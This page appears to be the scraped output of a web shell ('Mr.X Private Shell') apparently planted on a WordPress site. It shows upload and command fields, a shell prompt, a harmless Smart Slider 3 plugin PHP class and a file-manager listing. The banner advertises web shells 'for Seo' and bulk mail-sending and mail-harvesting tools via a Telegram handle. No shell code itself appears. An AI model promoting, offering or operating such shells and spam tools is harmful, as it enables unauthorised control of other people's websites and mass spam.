__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php


namespace Nextend\SmartSlider3\SlideBuilder;

use Nextend\SmartSlider3\Renderable\Item;

class BuilderComponentItem extends AbstractBuilderComponent {

    /**
     * @var Item\AbstractItem
     */
    protected $item;

    /**
     *
     * @param AbstractBuilderComponent $container
     * @param string                   $type
     */
    public function __construct($container, $type) {
        $this->item        = Item\ItemFactory::getItem($type);
        $this->defaultData = array_merge($this->defaultData, $this->item->getValues());

        $container->add($this);
    }

    public function getData() {
        return array(
            'type'   => $this->item->getType(),
            'values' => parent::getData()
        );
    }

    public function getLabel() {
        return $this->item->getTitle();
    }

    public function getLayerProperties() {
        return $this->item->getLayerProperties();
    }
}

Filemanager

Name Type Size Permission Actions
AbstractBuilderComponent.php File 781 B 0664
BuilderComponentCol.php File 1.1 KB 0664
BuilderComponentContent.php File 913 B 0664
BuilderComponentItem.php File 932 B 0664
BuilderComponentLayer.php File 3.04 KB 0664
BuilderComponentRow.php File 930 B 0664
BuilderComponentSlide.php File 1.9 KB 0664
Filemanager